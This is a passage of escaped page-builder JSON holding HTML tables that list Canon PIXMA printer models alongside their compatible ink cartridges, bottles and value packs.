(Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<\\/p><table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td><td>CLI-8 (Black)<\\/td><\\/tr><tr><td>CLI-8 (Cyan)<\\/td><\\/tr><tr><td>CLI-8 (Magenta)<\\/td><\\/tr><tr><td>CLI-8 (Yellow)<\\/td><\\/tr><tr><td>PGI-5 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td>PGI-755XXL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td>PGI-750 (Pigment Black)<\\/td><\\/tr><tr><td>PGI-750XL (Pigment Black)<\\/td><\\/tr><tr><td>PGI-755XXL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>CL-746XL (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><tr><td>PG-745XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td><td>CL-746 (Colour)<\\/td><\\/tr><tr><td>CL-746S (Colour)<\\/td><\\/tr><tr><td>CL-746XL (Colour)<\\/td><\\/tr><tr><td>PG-745 (Pigment Black)<\\/td><\\/tr><tr><td>PG-745S (Pigment Black)<\\/td><\\/tr><tr><td>PG-745XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"  <table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n    <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td>\\n      <td>CL-741 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-741XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740\\/CL-741 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-740XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td>\\n      <td>CLI-751 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-751XL (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <\\/tbody>\\n  <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment 